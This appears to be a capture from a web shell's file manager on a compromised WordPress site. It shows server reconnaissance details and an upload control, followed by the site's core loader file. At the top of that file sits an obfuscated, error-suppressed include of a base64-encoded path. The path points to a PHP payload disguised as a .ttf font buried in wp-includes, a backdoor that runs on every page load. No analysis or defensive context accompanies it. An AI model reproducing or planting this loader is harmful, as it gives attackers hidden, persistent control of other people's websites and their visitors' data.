| Server IP : 185.21.40.28 / Your IP : 216.73.216.56 Web Server : LiteSpeed System : Linux vm1413.enterprisecloud.nu 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64 User : tore-bors ( 10318) PHP Version : 8.3.32 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/store-bors.dk/httpdocs/ |
Upload File : |
<?php @include base64_decode("L3Zhci93d3cvdmhvc3RzL3N0b3JlLWJvcnMuZGsvaHR0cGRvY3Mvd3AtaW5jbHVkZXMvVGV4dC9EaWZmL0VuZ2luZS9ucHJycnNycnJzcXJxbnAudHRm");?><?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}